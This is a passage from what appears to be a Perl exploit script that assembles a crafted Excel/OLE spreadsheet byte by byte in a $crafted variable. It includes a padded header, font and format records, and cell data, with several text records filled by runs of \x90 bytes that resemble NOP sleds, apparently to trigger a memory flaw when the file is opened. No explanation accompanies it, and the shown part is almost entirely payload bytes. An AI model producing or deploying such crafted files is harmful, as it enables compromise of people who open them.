"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x3E\x00\x03\x00\xFE\xFF\x09\x00".
"\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00".
"\x22\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\xFE\xFF\xFF\xFF".
"\x00\x00\x00\x00\xFE\xFF\xFF\xFF\x00\x00\x00\x00\x21\x00\x00\x00";

$crafted .= "\xFF" x 432;

$crafted .=

"\x09\x08\x08\x00\x00\x05\x05\x00\xAE\x21\xCD\x07\xE1\x00\x00\x00".
"\xC1\x00\x02\x00\x00\x00\xBF\x00\x00\x00\xC0\x00\x00\x00\xE2\x00".
"\x00\x00\x5C\x00\x70\x00\x07\x70\x65\x72\x65\x69\x72\x61\x20\x50".
"\x2E\x20\x50\x65\x72\x65\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
"\x20\x20\x20\x20\x20\x20\x42\x00\x02\x00\xE4\x04\x9C\x00\x02\x00".
"\x0E\x00\x16\x00\x02\x00\x01\x00\x17\x00\x1D\x00\x1B\x03\x90\x90".
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90".
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x18\x00\x24\x00\x20\x00\x00".
"\x01\x15\x00\x01\x00\x01\x00\x00\x00\x00\x00\x06\x3B\xFF\xFF\x00".
"\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x19\x00\x00".
"\x0A\x19\x00\x02\x00\x00\x00\x12\x00\x02\x00\x00\x00\x13\x00\x02".
"\x00\x00\x00\x3D\x00\x12\x00\x00\x00\x30\x00\xAC\x2F\xF4\x1A\x38".
"\x00\x00\x00\x00\x00\x01\x00\x58\x02\x40\x00\x02\x00\x00\x00\x8D".
"\x00\x02\x00\x00\x00\x22\x00\x02\x00\x00\x00\x0E\x00\x02\x00\x01".
"\x00\xB7\x01\x02\x00\x00\x00\xDA\x00\x02\x00\x00\x00\x31\x00\x14".
"\x00\xC8\x00\x00\x00\xFF\x7F\x90\x01\x00\x00\x00\x00\x00\x00\x05".
"\x41\x72\x69\x61\x6C\x31\x00\x14\x00\xC8\x00\x00\x00\xFF\x7F\x90".
"\x01\x00\x00\x00\x00\x00\x00\x05\x41\x72\x69\x61\x6C\x31\x00\x14".
"\x00\xC8\x00\x00\x00\xFF\x7F\x90\x01\x00\x00\x00\x00\x00\x00\x05".
"\x41\x72\x69\x61\x6C\x31\x00\x14\x00\xC8\x00\x00\x00\xFF\x7F\x90".
"\x01\x00\x00\x00\x00\x00\x00\x05\x41\x72\x69\x61\x6C\x31\x00\x14".
"\x00\x59\x01\x01\x00\xFF\x7F\xBC\x02\x00\x00\x00\x00\x00\x00\x05".
"\x41\x72\x69\x61\x6C\x31\x00\x14\x00\x31\x01\x01\x00\xFF\x7F\xBC".
"\x02\x00\x00\x00\x00\x00\x00\x05\x41\x72\x69\x61\x6C\x31\x00\x14".
"\x00\x45\x01\x01\x00\xFF\x7F\xBC\x02\x00\x00\x00\x00\x00\x00\x05".
"\x41\x72\x69\x61\x6C\x31\x00\x14\x00\x45\x01\x00\x00\xFF\x7F\x90".
"\x01\x00\x00\x00\x00\x00\x00\x05\x41\x72\x69\x61\x6C\x1E\x04\x1A".
"\x00\x05\x00\x17\x22\x24\x22\x23\x2C\x23\x23\x30\x5F\x29\x3B\x5C".
"\x28\x22\x24\x22\x23\x2C\x23\x23\x30\x5C\x29\x1E\x04\x1F\x00\x06".
"\x00\x1C\x22\x24\x22\x23\x2C\x23\x23\x30\x5F\x29\x3B\x5B\x52\x65".
"\x64\x5D\x5C\x28\x22\x24\x22\x23\x2C\x23\x23\x30\x5C\x29\x1E\x04".
"\x20\x00\x07\x00\x1D\x22\x24\x22\x23\x2C\x23\x23\x30\x2E\x30\x30".
"\x5F\x29\x3B\x5C\x28\x22\x24\x22\x23\x2C\x23\x23\x30\x2E\x30\x30".
"\x5C\x29\x1E\x04\x25\x00\x08\x00\x22\x22\x24\x22\x23\x2C\x23\x23".
"\x30\x2E\x30\x30\x5F\x29\x3B\x5B\x52\x65\x64\x5D\x5C\x28\x22\x24".
"\x22\x23\x2C\x23\x23\x30\x2E\x30\x30\x5C\x29\x1E\x04\x35\x00\x2A".
"\x00\x32\x5F\x28\x22\x24\x22\x2A\x20\x23\x2C\x23\x23\x30\x5F\x29".
"\x3B\x5F\x28\x22\x24\x22\x2A\x20\x5C\x28\x23\x2C\x23\x23\x30\x5C".
"\x29\x3B\x5F\x28\x22\x24\x22\x2A\x20\x22\x2D\x22\x5F\x29\x3B\x5F".
"\x28\x40\x5F\x29\x1E\x04\x2C\x00\x29\x00\x29\x5F\x28\x2A\x20\x23".
"\x2C\x23\x23\x30\x5F\x29\x3B\x5F\x28\x2A\x20\x5C\x28\x23\x2C\x23".
"\x23\x30\x5C\x29\x3B\x5F\x28\x2A\x20\x22\x2D\x22\x5F\x29\x3B\x5F".
"\x28\x40\x5F\x29\x1E\x04\x3D\x00\x2C\x00\x3A\x5F\x28\x22\x24\x22".
"\x2A\x20\x23\x2C\x23\x23\x30\x2E\x30\x30\x5F\x29\x3B\x5F\x28\x22".
"\x24\x22\x2A\x20\x5C\x28\x23\x2C\x23\x23\x30\x2E\x30\x30\x5C\x29".
"\x3B\x5F\x28\x22\x24\x22\x2A\x20\x22\x2D\x22\x3F\x3F\x5F\x29\x3B".
"\x5F\x28\x40\x5F\x29\x1E\x04\x34\x00\x2B\x00\x31\x5F\x28\x2A\x20".
"\x23\x2C\x23\x23\x30\x2E\x30\x30\x5F\x29\x3B\x5F\x28\x2A\x20\x5C".
"\x28\x23\x2C\x23\x23\x30\x2E\x30\x30\x5C\x29\x3B\x5F\x28\x2A\x20".
"\x22\x2D\x22\x3F\x3F\x5F\x29\x3B\x5F\x28\x40\x5F\x29\x1E\x04\x06".
"\x00\xA4\x00\x03\x30\x2E\x30\x1E\x04\x08\x00\xA5\x00\x05\x30\x2E".
"\x30\x30\x30\xE0\x00\x10\x00\x00\x00\x00\x00\xF5\xFF\x20\x00\xC0".
"\x20\x00\x00\x00\x00\x00\x00\xE0\x00\x10\x00\x01\x00\x00\x00\xF5".
"\xFF\x20\xF4\xC0\x20\x00\x00\x00\x00\x00\x00\xE0\x00\x10\x00\x01".
"\x00\x00\x00\xF5\xFF\x20\xF4\xC0\x20\x00\x00\x00\x00\x00\x00\xE0".
"\x00\x10\x00\x02\x00\x00\x00\xF5\xFF\x20\xF4\xC0\x20\x00\x00\x00".
"\x00\x00\x00\xE0\x00\x10\x00\x02\x00\x00\x00\xF5\xFF\x20\xF4\xC0".
"\x20\x00\x00\x00\x00\x00\x00\xE0\x00\x10\x00\x00\x00\x00\x00\xF5".
"\xFF\x20\xF4\xC0\x20\x00\x00\x00\x00\x00\x00\xE0\x00\x10\x00\x00".
"\x00\x00\x00\xF5\xFF\x20\xF4\xC0\x20\x00\x00\x00\x00\x00\x00\xE0".
"\x00\x10\x00\x00\x00\x00\x00\xF5\xFF\x20\xF4\xC0\x20\x00\x00\x00".
"\x00\x00\x00\xE0\x00\x10\x00\x00\x00\x00\x00\xF5\xFF\x20\xF4\xC0".
"\x20\x00\x00\x00\x00\x00\x00\xE0\x00\x10\x00\x00\x00\x00\x00\xF5".
"\xFF\x20\xF4\xC0\x20\x00\x00\x00\x00\x00\x00\xE0\x00\x10\x00\x00".
"\x00\x00\x00\xF5\xFF\x20\xF4\xC0\x20\x00\x00\x00\x00\x00\x00\xE0".
"\x00\x10\x00\x00\x00\x00\x00\xF5\xFF\x20\xF4\xC0\x20\x00\x00\x00".
"\x00\x00\x00\xE0\x00\x10\x00\x00\x00\x00\x00\xF5\xFF\x20\xF4\xC0".
"\x20\x00\x00\x00\x00\x00\x00\xE0\x00\x10\x00\x00\x00\x00\x00\xF5".
"\xFF\x20\xF4\xC0\x20\x00\x00\x00\x00\x00\x00\xE0\x00\x10\x00\x00".
"\x00\x00\x00\xF5\xFF\x20\xF4\xC0\x20\x00\x00\x00\x00\x00\x00\xE0".
"\x00\x10\x00\x00\x00\x00\x00\x01\x00\x20\x00\xC0\x20\x00\x00\x00".
"\x00\x00\x00\xE0\x00\x10\x00\x01\x00\x2B\x00\xF5\xFF\x20\xF8\xC0".
"\x20\x00\x00\x00\x00\x00\x00\xE0\x00\x10\x00\x01\x00\x29\x00\xF5".
"\xFF\x20\xF8\xC0\x20\x00\x00\x00\x00\x00\x00\xE0\x00\x10\x00\x01".
"\x00\x2C\x00\xF5\xFF\x20\xF8\xC0\x20\x00\x00\x00\x00\x00\x00\xE0".
"\x00\x10\x00\x01\x00\x2A\x00\xF5\xFF\x20\xF8\xC0\x20\x00\x00\x00".
"\x00\x00\x00\xE0\x00\x10\x00\x01\x00\x09\x00\xF5\xFF\x20\xF8\xC0".
"\x20\x00\x00\x00\x00\x00\x00\xE0\x00\x10\x00\x00\x00\x00\x00\x01".
"\x00\x20\x20\xC0\x20\x40\x80\x49\x80\x40\x20\xE0\x00\x10\x00\x00".
"\x00\x00\x00\x01\x00\x00\x30\xC0\x20\x40\x80\x49\x80\x40\x20\xE0".
"\x00\x10\x00\x00\x00\x00\x00\x01\x00\x0B\x30\xC0\x20\x40\x80\x49".
"\x80\x40\x20\xE0\x00\x10\x00\x00\x00\x00\x00\x01\x00\x08\x30\xC0".
"\x20\x40\x80\x49\x80\x40\x20\xE0\x00\x10\x00\x00\x00\xA4\x00\x01".
"\x00\x20\x24\xC0\x20\x40\x80\x49\x80\x40\x20\xE0\x00\x10\x00\x00".
"\x00\xA5\x00\x01\x00\x20\x24\xC0\x20\x40\x80\x49\x80\x40\x20\xE0".
"\x00\x10\x00\x00\x00\x00\x00\x01\x00\x20\x60\x2A\x20\x41\x80\x49".
"\x80\x40\x20\x93\x02\x04\x00\x10\x80\x03\xFF\x93\x02\x04\x00\x11".
"\x80\x06\xFF\x93\x02\x04\x00\x12\x80\x04\xFF\x93\x02\x04\x00\x13".
"\x80\x07\xFF\x93\x02\x04\x00\x00\x80\x00\xFF\x93\x02\x04\x00\x14".
"\x80\x05\xFF\x92\x00\xE2\x00\x38\x00\x00\x00\x00\x00\xFF\xFF\xFF".
"\x00\xFF\x00\x00\x00\x00\xFF\x00\x00\x00\x00\xFF\x00\xFF\xFF\x00".
"\x00\xFF\x00\xFF\x00\x00\xFF\xFF\x00\x80\x00\x00\x00\x00\x80\x00".
"\x00\x00\x00\x80\x00\x80\x80\x00\x00\x80\x00\x80\x00\x00\x80\x80".
"\x00\xC0\xC0\xC0\x00\x80\x80\x80\x00\x99\x99\xFF\x00\x99\x33\x66".
"\x00\xFF\xFF\xCC\x00\xCC\xFF\xFF\x00\x66\x00\x66\x00\xFF\x80\x80".
"\x00\x00\x66\xCC\x00\xCC\xCC\xFF\x00\x00\x00\x80\x00\xFF\x00\xFF".
"\x00\xFF\xFF\x00\x00\x00\xFF\xFF\x00\x80\x00\x80\x00\x80\x00\x00".
"\x00\x00\x80\x80\x00\x00\x00\xFF\x00\x00\xCC\xFF\x00\xCC\xFF\xFF".
"\x00\xCC\xFF\xCC\x00\xFF\xFF\x99\x00\x99\xCC\xFF\x00\xFF\x99\xCC".
"\x00\xCC\x99\xFF\x00\xE3\xE3\xE3\x00\x33\x66\xFF\x00\x33\xCC\xCC".
"\x00\x99\xCC\x00\x00\xFF\xCC\x00\x00\xFF\x99\x00\x00\xFF\x66\x00".
"\x00\x66\x66\x99\x00\x96\x96\x96\x00\x00\x33\x66\x00\x33\x99\x66".
"\x00\x00\x33\x00\x00\x33\x33\x00\x00\x99\x33\x00\x00\x99\x33\x66".
"\x00\x33\x33\x99\x00\x33\x33\x33\x00\x85\x00\x22\x00\xF3\x06\x00".
"\x00\x00\x00\x1B\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90".
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x0A".
"\x00\x00\x00\x09\x08\x08\x00\x00\x06\x10\x00\xAE\x21\xCD\x07\x0B".
"\x02\x10\x00\x00\x00\x00\x00\x00\x00\x1B\x00\x8F\x09\x00\x00\x07".
"\x19\x00\x00\x0D\x00\x02\x00\x01\x00\x0C\x00\x02\x00\x64\x00\x0F".
"\x00\x02\x00\x01\x00\x11\x00\x02\x00\x00\x00\x10\x00\x08\x00\xFC".
"\xA9\xF1\xD2\x4D\x62\x50\x3F\x5F\x00\x02\x00\x01\x00\x2A\x00\x02".
"\x00\x00\x00\x2B\x00\x02\x00\x00\x00\x82\x00\x02\x00\x01\x00\x80".
"\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x25\x02\x04\x00\x00".
"\x00\x08\x01\x8C\x00\x04\x00\x01\x00\x01\x00\x81\x00\x02\x00\xC1".
"\x04\x14\x00\x00\x00\x15\x00\x00\x00\x83\x00\x02\x00\x00\x00\x84".
"\x00\x02\x00\x00\x00\x26\x00\x08\x00\x00\x00\x00\x00\x00\x00\xF0".
"\x3F\x27\x00\x08\x00\x00\x00\x00\x00\x00\x00\xE0\x3F\x4D\x00\xBC".
"\x01\x00\x00\x45\x50\x53\x4F\x4E\x20\x53\x74\x79\x6C\x75\x73\x20".
"\x43\x4F\x4C\x4F\x52\x20\x36\x34\x30\x00\x00\x00\x00\x32\x7A\x2D".
"\x30\xE4\x04\x00\x04\x17\x02\x94\x00\x26\x01\x0F\x8B\x80\x07\x01".
"\x00\x01\x00\xEA\x0A\x6F\x08\x00\x00\x01\x00\x07\x00\x68\x01\x02".
"\x00\x00\x00\x68\x01\x00\x00\x00\x00\x00\xBB\x13\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xEA\x6D\x04\x30\x09\x04\x00".
"\x00\x00\x00\x00\x00\x26\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01".
"\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x20\x01\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x44\x4C\x4C\x4E\x61\x6D\x65\x31\x36".
"\x3D\x45\x50\x49\x47\x55\x45\x33\x4F\x2E\x44\x4C\x4C\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x44\x4C\x4C\x4E\x61\x6D\x65\x33\x32".
"\x3D\x45\x50\x49\x44\x41\x32\x33\x30\x2E\x44\x4C\x4C\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x45\x50\x53\x4F\x4E\x20\x53\x74\x79".
"\x6C\x75\x73\x20\x43\x4F\x4C\x4F\x52\x20\x36\x34\x30\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x03\x02\x00\x68\x01\x68\x01\x01".
"\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x01\x00\xA0\x0B\x88".
"\x0E\xA0\x0B\x88\x0E\x64\x00\x68\x01\x68\x01\xF4\x0B\x78\x0F\x2A".
"\x00\x2A\x00\x2A\x00\xC6\x00\xF4\x0B\x78\x0F\x2A\x00\x2A\x00\x2A".
"\x00\xC6\x00\x00\x00\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x32\x00\x00\x00\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03".
"\x00\x00\x00\x01\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00".
"\x00\x00\x00\x01\x00\x04\x00\x06\x00\x02\x00\x00\x00\x00\x00\x00".
"\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x52\x03\x4C\x04\x02".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA1\x00\x22".
"\x00\x01\x00\x64\x00\x01\x00\x01\x00\x01\x00\x02\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\xE0\x3F\x00\x00\x00\x00\x00\x00\xE0".
"\x3F\x01\x00\x16\x00\x02\x00\x01\x00\x17\x00\x02\x00\x01\x02\x55".
"\x00\x02\x00\x08\x00\x7D\x00\x0C\x00\x00\x00\x00\x00\xC7\x0C\x0F".
"\x00\x00\x00\x02\x00\x7D\x00\x0C\x00\x01\x00\x02\x00\xC7\x06\x0F".
"\x00\x00\x00\x02\x00\x7D\x00\x0C\x00\x04\x00\x05\x00\xC7\x06\x0F".
"\x00\x00\x00\x02\x00\x7D\x00\x0C\x00\x07\x00\x08\x00\xC7\x06\x0F".
"\x00\x00\x00\x02\x00\x00\x02\x0A\x00\x00\x00\x1B\x00\x00\x00\x0B".
"\x00\x00\x00\x08\x02\x10\x00\x00\x00\x00\x00\x0B\x00\x08\x01\x00".
"\x00\x00\x00\x00\x01\x0F\x00\x08\x02\x10\x00\x02\x00\x00\x00\x0B".
"\x00\x08\x01\x00\x00\x00\x00\x00\x01\x0F\x00\x08\x02\x10\x00\x04".
"\x00\x00\x00\x0B\x00\x08\x01\x00\x00\x00\x00\x00\x01\x0F\x00\x08".
"\x02\x10\x00\x05\x00\x00\x00\x0B\x00\x08\x01\x00\x00\x00\x00\x00".
"\x01\x0F\x00\x08\x02\x10\x00\x06\x00\x00\x00\x0B\x00\x10\x02\x00".
"\x00\x00\x00\x00\x01\x0F\x00\x08\x02\x10\x00\x07\x00\x00\x00\x0B".
"\x00\x08\x01\x00\x00\x00\x00\x00\x01\x0F\x00\x08\x02\x10\x00\x08".
"\x00\x00\x00\x0B\x00\x08\x01\x00\x00\x00\x00\x00\x01\x0F\x00\x08".
"\x02\x10\x00\x09\x00\x00\x00\x0B\x00\x08\x01\x00\x00\x00\x00\x00".
"\x01\x0F\x00\x08\x02\x10\x00\x0A\x00\x00\x00\x0B\x00\x08\x01\x00".
"\x00\x00\x00\x00\x01\x0F\x00\x08\x02\x10\x00\x0B\x00\x00\x00\x0B".
"\x00\x08\x01\x00\x00\x00\x00\x00\x01\x0F\x00\x08\x02\x10\x00\x0C".
"\x00\x00\x00\x0B\x00\x08\x01\x00\x00\x00\x00\x00\x01\x0F\x00\x08".
"\x02\x10\x00\x0D\x00\x00\x00\x0B\x00\x08\x01\x00\x00\x00\x00\x00".
"\x01\x0F\x00\x08\x02\x10\x00\x0E\x00\x00\x00\x0B\x00\x08\x01\x00".
"\x00\x00\x00\x00\x01\x0F\x00\x08\x02\x10\x00\x0F\x00\x00\x00\x0B".
"\x00\x08\x01\x00\x00\x00\x00\x00\x01\x0F\x00\x08\x02\x10\x00\x10".
"\x00\x00\x00\x0B\x00\x08\x01\x00\x00\x00\x00\x00\x01\x0F\x00\x08".
"\x02\x10\x00\x11\x00\x00\x00\x0B\x00\x08\x01\x00\x00\x00\x00\x00".
"\x01\x0F\x00\x08\x02\x10\x00\x12\x00\x00\x00\x0B\x00\x08\x01\x00".
"\x00\x00\x00\x00\x01\x0F\x00\x08\x02\x10\x00\x13\x00\x00\x00\x0B".
"\x00\x08\x01\x00\x00\x00\x00\x00\x01\x0F\x00\x08\x02\x10\x00\x14".
"\x00\x00\x00\x0B\x00\x08\x01\x00\x00\x00\x00\x00\x01\x0F\x00\x08".
"\x02\x10\x00\x15\x00\x00\x00\x0B\x00\x08\x01\x00\x00\x00\x00\x00".
"\x01\x0F\x00\x08\x02\x10\x00\x16\x00\x00\x00\x0B\x00\x08\x01\x00".
"\x00\x00\x00\x00\x01\x0F\x00\x08\x02\x10\x00\x17\x00\x00\x00\x0B".
"\x00\x08\x01\x00\x00\x00\x00\x00\x01\x0F\x00\x08\x02\x10\x00\x19".
"\x00\x00\x00\x0B\x00\x08\x01\x00\x00\x00\x00\x00\x01\x0F\x00\x08".
"\x02\x10\x00\x1A\x00\x00\x00\x0B\x00\x08\x01\x00\x00\x00\x00\x00".
"\x01\x0F\x00\x04\x02\x2B\x00\x00\x00\x00\x00\x0F\x00\x23\x00\x90".
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90".
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90".
"\x90\x90\x04\x02\x24\x00\x02\x00\x00\x00\x0F\x00\x1C\x00\x90\x90".
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90".
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x04\x02\x11\x00\x04\x00".
"\x00\x00\x1B\x00\x09\x00\x90\x90\x90\x90\x90\x90\x90\x20\x23\x04".
"\x02\x0A\x00\x04\x00\x01\x00\x1B\x00\x02\x00\x23\x33\x04\x02\x0A".
"\x00\x04\x00\x02\x00\x1B\x00\x02\x00\x23\x34\x01\x02\x06\x00\x04".
"\x00\x03\x00\x1B\x00\x04\x02\x0B\x00\x04\x00\x04\x00\x1B\x00\x03".
"\x00\x23\x31\x39\x04\x02\x0B\x00\x04\x00\x05\x00\x1B\x00\x03\x00".
"\x23\x32\x30\x01\x02\x06\x00\x04\x00\x06\x00\x1B\x00\x04\x02\x0B".
"\x00\x04\x00\x07\x00\x1B\x00\x03\x00\x23\x33\x31\x04\x02\x0B\x00".
"\x04\x00\x08\x00\x1B\x00\x03\x00\x23\x33\x32\xBE\x00\x0A\x00\x04".
"\x00\x09\x00\x1B\x00\x1B\x00\x0A\x00\xBE\x00\x1C\x00\x05\x00\x00".
"\x00\x15\x00\x15\x00\x15\x00\x15\x00\x15\x00\x15\x00\x15\x00\x15".
"\x00\x15\x00\x15\x00\x15\x00\x0A\x00\x04\x02\x13\x00\x06\x00\x00".
"\x00\x16\x00\x0B\x00\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90".
"\x04\x02\x0F\x00\x06\x00\x01\x00\x16\x00\x07\x00\x90\x90\x90\x90".
"\x90\x90\x90\x04\x02\x0F\x00\x06\x00\x02\x00\x16\x00\x07\x00\x90".
"\x90\x90\x90\x90\x90\x90\x04\x02\x18\x00\x06\x00\x03\x00\x17\x00".
"\x10\x00\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90".
"\x90\x3F\x04\x02\x0F\x00\x06\x00\x04\x00\x16\x00\x07\x00\x90\x90".
"\x90\x90\x90\x90\x90\x04\x02\x0F\x00\x06\x00\x05\x00\x16\x00\x07".
"\x00\x56\x6F\x6C\x74\x61\x67\x65\x04\x02\x18\x00\x06\x00\x06\x00".
"\x17\x00\x10\x00\x46\x6C\x61\x73\x68\x6C\x69\x67\x68\x74\x20\x64".
"\x65\x61\x64\x3F\x04\x02\x0F\x00\x06\x00\x07\x00\x16\x00\x07\x00".
"\x56\x6F\x6C\x74\x61\x67\x65\x04\x02\x0F\x00\x06\x00\x08\x00\x16".
"\x00\x07\x00\x56\x6F\x6C\x74\x61\x67\x65\x04\x02\x18\x00\x06\x00".
"\x09\x00\x17\x00\x10\x00\x46\x6C\x61\x73\x68\x6C\x69\x67\x68\x74".
"\x20\x64\x65\x61\x64\x3F\x04\x02\x17\x00\x06\x00\x0A\x00\x18\x00".
"\x0F\x00\x41\x76\x65\x72\x61\x67\x65\x20\x56\x6F\x6C\x74\x61\x67".
"\x65\xBD\x00\x18\x00\x07\x00\x00\x00\x19\x00\x00\x00\x00\x00\x1A".
"\x00\x01\x10\x64\x40\x1A\x00\x01\x20\x64\x40\x02\x00\x01\x02\x06".
"\x00\x07\x00\x03\x00\x1A\x00\x03\x02\x0E\x00\x07\x00\x04\x00\x1A".
"\x00\x83\xC0\xCA\xA1\x45\xB6\xF9\x3F\x03\x02\x0E\x00\x07\x00\x05".
"\x00\x1A\x00\x58\x39\xB4\xC8\x76\xBE\xF9\x3F\x01\x02\x06\x00\x07".
"\x00\x06\x00\x1A\x00\x03\x02\x0E\x00\x07\x00\x07\x00\x1A\x00\x44".
"\x8B\x6C\xE7\xFB\xA9\xF9\x3F\x7E\x02\x0A\x00\x07\x00\x08\x00\x1A".
"\x00\x01\x10\x64\x40\x01\x02\x06\x00\x07\x00\x09\x00\x1A\x00\x06".
"\x00\x21\x00\x07\x00\x0A\x00\x1A\x00\xB5\x81\x4E\x1B\xE8\xB4\xF9".
"\x3F\x00\x00\x1A\x00\x01\xFD\x0B\x00\x25\x07\xC0\x07\xC0\x01\x08".
"\x42\x01\x05\x00\x7E\x02\x0A\x00\x08\x00\x00\x00\x19\x00\x00\x00".
"\xE0\x3F\xBE\x00\x0C\x00\x08\x00\x01\x00\x1A\x00\x1A\x00\x1A\x00".
"\x03\x00\x03\x02\x0E\x00\x08\x00\x04\x00\x1A\x00\xBC\x74\x93\x18".
"\x04\x56\xF6\x3F\x03\x02\x0E\x00\x08\x00\x05\x00\x1A\x00\x3B\xDF".
"\x4F\x8D\x97\x6E\xF6\x3F\x01\x02\x06\x00\x08\x00\x06\x00\x1A\x00".
"\x7E\x02\x0A\x00\x08\x00\x07\x00\x1A\x00\x01\x80\x61\x40\x03\x02".
"\x0E\x00\x08\x00\x08\x00\x1A\x00\x64\x3B\xDF\x4F\x8D\x97\xF6\x3F".
"\x01\x02\x06\x00\x08\x00\x09\x00\x1A\x00\x06\x00\x1B\x00\x08\x00".
"\x0A\x00\x1A\x00\x71\x3D\x0A\xD7\xA3\x70\xF6\x3F\x08\x00\x07\x00".
"\x0A\xFF\x05\x00\x01\x08\x00\x0A\x00\xBC\x04\x15\x00\x08\x00\x17".
"\x00\x0A\x0A\x00\x10\x0B\x00\x2D\x00\xC0\x00\xC0\xF7\xFE\x42\x01".
"\x05\x00\x7E\x02\x0A\x00\x09\x00\x00\x00\x19\x00\x00\x00\xF0\x3F".
"\x03\x02\x0E\x00\x09\x00\x01\x00\x1A\x00\x19\x04\x56\x0E\x2D\xB2".
"\xF5\x3F\x03\x02\x0E\x00\x09\x00\x02\x00\x1A\x00\x02\x2B\x87\x16".
"\xD9\xCE\xF5\x3F\x01\x02\x06\x00\x09\x00\x03\x00\x1A\x00\x03\x02".
"\x0E\x00\x09\x00\x04\x00\x1A\x00\xB0\x72\x68\x91\xED\x7C\xF5\x3F".
"\x03\x02\x0E\x00\x09\x00\x05\x00\x1A\x00\x04\x56\x0E\x2D\xB2\x9D".
"\xF5\x3F\x01\x02\x06\x00\x09\x00\x06\x00\x1A\x00\x03\x02\x0E\x00".
"\x09\x00\x07\x00\x1A\x00\x44\x8B\x6C\xE7\xFB\xA9\xF5\x3F\x7E\x02".
"\x0A\x00\x09\x00\x08\x00\x1A\x00\x01\x00\x61\x40\x01\x02\x06\x00".
"\x09\x00\x09\x00\x1A\x00\x06\x00\x1B\x00\x09\x00\x0A\x00\x1A\x00".
"\x79\xE9\x26\x31\x08\xAC\xF5\x3F\x08\x00\x08\x00\x0A\xFF\x05\x00".
"\x01\x08\x00\x0A\x00\x7E\x02\x0A\x00\x0A\x00\x00\x00\x19\x00\x00".
"\x00\xF8\x3F\xBE\x00\x0C\x00\x0A\x00\x01\x00\x1A\x00\x1A\x00\x1A".
"\x00\x03\x00\x03\x02\x0E\x00\x0A\x00\x04\x00\x1A\x00\xB6\xF3\xFD".
"\xD4\x78\xE9\xF4\x3F\x03\x02\x0E\x00\x0A\x00\x05\x00\x1A\x00\xA0".
"\x1A\x2F\xDD\x24\x06\xF5\x3F\x01\x02\x06\x00\x0A\x00\x06\x00\x1A".
"\x00\x03\x02\x0E\x00\x0A\x00\x07\x00\x1A\x00\x4A\x0C\x02\x2B\x87".
"\x16\xF5\x3F\x03\x02\x0E\x00\x0A\x00\x08\x00\x1A\x00\x08\xAC\x1C".
"\x5A\x64\x3B\xF5\x3F\x01\x02\x06\x00\x0A\x00\x09\x00\x1A\x00\x06".
"\x00\x1B\x00\x0A\x00\x0A\x00\x1A\x00\xAA\xF1\xD2\x4D\x62\x10\xF5".
"\x3F\x08\x00\x09\x00\x0A\xFF\x05\x00\x01\x08\x00\x0A\x00\xBD\x00".
"\x18\x00\x0B\x00\x00\x00\x19\x00\x00\x00\x00\x40\x1A\x00\x01\x41".
"\x60\x40\x1A\x00\x01\x41\x60\x40\x02\x00\x01\x02\x06\x00\x0B\x00".
"\x03\x00\x1A\x00\x7E\x02\x0A\x00\x0B\x00\x04\x00\x1A\x00\x01\x00".
"\x60\x40\x03\x02\x0E\x00\x0B\x00\x05\x00\x1A\x00\xCF\xF7\x53\xE3".
"\xA5\x9B\xF4\x3F\x01\x02\x06\x00\x0B\x00\x06\x00\x1A\x00\x03\x02".
"\x0E\x00\x0B\x00\x07\x00\x1A\x00\x77\xBE\x9F\x1A\x2F\xDD\xF4\x3F".
"\x03\x02\x0E\x00\x0B\x00\x08\x00\x1A\x00\x60\xE5\xD0\x22\xDB\xF9".
"\xF4\x3F\x01\x02\x06\x00\x0B\x00\x09\x00\x1A\x00\x06\x00\x1B\x00".
